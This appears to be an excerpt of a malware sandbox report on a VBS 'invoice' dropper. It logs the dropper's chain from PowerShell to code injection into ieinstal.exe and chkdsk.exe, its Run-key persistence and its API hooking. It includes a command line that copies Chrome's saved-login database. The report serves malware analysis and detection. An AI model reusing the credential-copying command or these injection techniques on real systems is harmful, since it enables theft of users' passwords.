Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FFCF00 32_2_04FFCF00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF28C0 32_2_04FF28C0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF9870 32_2_04FF9870
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FD6868 32_2_04FD6868
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AE9A6 32_2_050AE9A6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050359C0 32_2_050359C0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF3800 32_2_04FF3800
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0501E810 32_2_0501E810
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05090835 32_2_05090835
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FEE9A0 32_2_04FEE9A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0500B870 32_2_0500B870
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AF872 32_2_050AF872
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05006882 32_2_05006882
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050698B2 32_2_050698B2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A18DA 32_2_050A18DA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A78F3 32_2_050A78F3
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0502DB19 32_2_0502DB19
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AFB2E 32_2_050AFB2E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05064BC0 32_2_05064BC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050ACA13 32_2_050ACA13
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AEA5B 32_2_050AEA5B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AFA89 32_2_050AFA89
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0500FAA0 32_2_0500FAA0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF0B10 32_2_04FF0B10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071E7C6 32_2_0071E7C6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_00702D90 32_2_00702D90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_00702D87 32_2_00702D87
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_00709E50 32_2_00709E50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_00709E4F 32_2_00709E4F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_00702FB0 32_2_00702FB0
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE730232 37_2_00000265BE730232
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE72F036 37_2_00000265BE72F036
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE7335CD 37_2_00000265BE7335CD
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE726082 37_2_00000265BE726082
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE72AB30 37_2_00000265BE72AB30
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE72AB32 37_2_00000265BE72AB32
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE72D912 37_2_00000265BE72D912
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE727D02 37_2_00000265BE727D02
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 04FDB910 appears 268 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 05025050 appears 36 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0506EF10 appears 105 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 05037BE4 appears 89 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0505E692 appears 79 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1F03E692 appears 82 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1F04EF10 appears 105 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1F005050 appears 36 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1EFBB910 appears 268 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1F017BE4 appears 96 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002F00 NtCreateFile,LdrInitializeThunk, 27_2_1F002F00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002E50 NtCreateSection,LdrInitializeThunk, 27_2_1F002E50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002EB0 NtProtectVirtualMemory,LdrInitializeThunk, 27_2_1F002EB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002ED0 NtResumeThread,LdrInitializeThunk, 27_2_1F002ED0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002D10 NtQuerySystemInformation,LdrInitializeThunk, 27_2_1F002D10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002DA0 NtReadVirtualMemory,LdrInitializeThunk, 27_2_1F002DA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 27_2_1F002DC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002C30 NtMapViewOfSection,LdrInitializeThunk, 27_2_1F002C30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002C50 NtUnmapViewOfSection,LdrInitializeThunk, 27_2_1F002C50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002CF0 NtDelayExecution,LdrInitializeThunk, 27_2_1F002CF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002B10 NtAllocateVirtualMemory,LdrInitializeThunk, 27_2_1F002B10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002B90 NtFreeVirtualMemory,LdrInitializeThunk, 27_2_1F002B90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002BC0 NtQueryInformationToken,LdrInitializeThunk, 27_2_1F002BC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002A80 NtClose,LdrInitializeThunk, 27_2_1F002A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0029F0 NtReadFile,LdrInitializeThunk, 27_2_1F0029F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002F30 NtOpenDirectoryObject, 27_2_1F002F30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002FB0 NtSetValueKey, 27_2_1F002FB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002E00 NtQueueApcThread, 27_2_1F002E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002E80 NtCreateProcessEx, 27_2_1F002E80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002EC0 NtQuerySection, 27_2_1F002EC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002D50 NtWriteVirtualMemory, 27_2_1F002D50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002C10 NtOpenProcess, 27_2_1F002C10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002C20 NtSetInformationFile, 27_2_1F002C20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F003C30 NtOpenProcessToken, 27_2_1F003C30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F003C90 NtOpenThread, 27_2_1F003C90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002CD0 NtEnumerateKey, 27_2_1F002CD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002B00 NtQueryValueKey, 27_2_1F002B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002B20 NtQueryInformationProcess, 27_2_1F002B20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002B80 NtCreateKey, 27_2_1F002B80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002BE0 NtQueryVirtualMemory, 27_2_1F002BE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002A10 NtWriteFile, 27_2_1F002A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002AA0 NtQueryInformationFile, 27_2_1F002AA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002AC0 NtEnumerateValueKey, 27_2_1F002AC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0029D0 NtWaitForSingleObject, 27_2_1F0029D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0038D0 NtGetContextThread, 27_2_1F0038D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F004570 NtSuspendThread, 27_2_1F004570
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0034E0 NtCreateMutant, 27_2_1F0034E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F004260 NtSetContextThread, 27_2_1F004260
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050234E0 NtCreateMutant,LdrInitializeThunk, 32_2_050234E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022D10 NtQuerySystemInformation,LdrInitializeThunk, 32_2_05022D10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 32_2_05022DC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022C20 NtSetInformationFile,LdrInitializeThunk, 32_2_05022C20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022C30 NtMapViewOfSection,LdrInitializeThunk, 32_2_05022C30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022CF0 NtDelayExecution,LdrInitializeThunk, 32_2_05022CF0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022F00 NtCreateFile,LdrInitializeThunk, 32_2_05022F00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022FB0 NtSetValueKey,LdrInitializeThunk, 32_2_05022FB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022E50 NtCreateSection,LdrInitializeThunk, 32_2_05022E50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050229F0 NtReadFile,LdrInitializeThunk, 32_2_050229F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022B00 NtQueryValueKey,LdrInitializeThunk, 32_2_05022B00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022B10 NtAllocateVirtualMemory,LdrInitializeThunk, 32_2_05022B10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022B80 NtCreateKey,LdrInitializeThunk, 32_2_05022B80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022B90 NtFreeVirtualMemory,LdrInitializeThunk, 32_2_05022B90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022BC0 NtQueryInformationToken,LdrInitializeThunk, 32_2_05022BC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022A10 NtWriteFile,LdrInitializeThunk, 32_2_05022A10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022A80 NtClose,LdrInitializeThunk, 32_2_05022A80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022AC0 NtEnumerateValueKey,LdrInitializeThunk, 32_2_05022AC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05024570 NtSuspendThread, 32_2_05024570
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05024260 NtSetContextThread, 32_2_05024260
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022D50 NtWriteVirtualMemory, 32_2_05022D50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022DA0 NtReadVirtualMemory, 32_2_05022DA0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022C10 NtOpenProcess, 32_2_05022C10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05023C30 NtOpenProcessToken, 32_2_05023C30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022C50 NtUnmapViewOfSection, 32_2_05022C50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05023C90 NtOpenThread, 32_2_05023C90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022CD0 NtEnumerateKey, 32_2_05022CD0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022F30 NtOpenDirectoryObject, 32_2_05022F30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022E00 NtQueueApcThread, 32_2_05022E00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022E80 NtCreateProcessEx, 32_2_05022E80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022EB0 NtProtectVirtualMemory, 32_2_05022EB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022EC0 NtQuerySection, 32_2_05022EC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022ED0 NtResumeThread, 32_2_05022ED0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050229D0 NtWaitForSingleObject, 32_2_050229D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050238D0 NtGetContextThread, 32_2_050238D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022B20 NtQueryInformationProcess, 32_2_05022B20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022BE0 NtQueryVirtualMemory, 32_2_05022BE0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022AA0 NtQueryInformationFile, 32_2_05022AA0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A350 NtCreateFile, 32_2_0071A350
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A400 NtReadFile, 32_2_0071A400
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A480 NtClose, 32_2_0071A480
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A530 NtAllocateVirtualMemory, 32_2_0071A530
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A3FA NtReadFile, 32_2_0071A3FA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A47A NtClose, 32_2_0071A47A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A52A NtAllocateVirtualMemory, 32_2_0071A52A
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE730232 NtCreateFile,NtWriteFile, 37_2_00000265BE730232
Source: WWVN_INVOICE_8363567453.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: edgegdi.dll Jump to behavior
Source: WWVN_INVOICE_8363567453.vbs ReversingLabs: Detection: 24%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand " Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220510 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Hetero3.dat Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@22/16@21/8
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:596:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:596:120:WilError_03
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
Source: C:\Windows\SysWOW64\chkdsk.exe File written: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogri.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: chkdsk.pdbGCTL source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ieinstal.pdbGCTL source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ieinstal.pdb source: explorer.exe, 0000001C.00000000.2251744997.0000000013CFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5740632110.00000000054FF000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5722127650.00000000009A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: $2l8C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: chkdsk.pdb source: ieinstal.exe, 0000001B.00000003.1964236192.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1967643409.0000000002D90000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1698742913.000000001EC39000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000003.1704233276.000000001EDEA000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.1972803032.0000000004E08000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.pdb source: powershell.exe, 0000000D.00000002.1816473649.0000000008901000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 0000000D.00000002.1828222321.0000000009C70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.1581138721.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_0300E359 push F6D28566h; ret 27_2_0300E35E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0070E287 push B364374Eh; iretd 32_2_0070E2E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071D4F2 push eax; ret 32_2_0071D4F8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071D4FB push eax; ret 32_2_0071D562
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071D4A5 push eax; ret 32_2_0071D4F8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071D55C push eax; ret 32_2_0071D562
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071E90F push esp; ret 32_2_0071E916
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_00717B37 push cs; ret 32_2_00717B39
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.dll Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE72ACD4 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW, 37_2_00000265BE72ACD4
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE72ACE2 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW, 37_2_00000265BE72ACE2
Source: C:\Windows\SysWOW64\chkdsk.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LJO0FHTXHPX Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE9
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
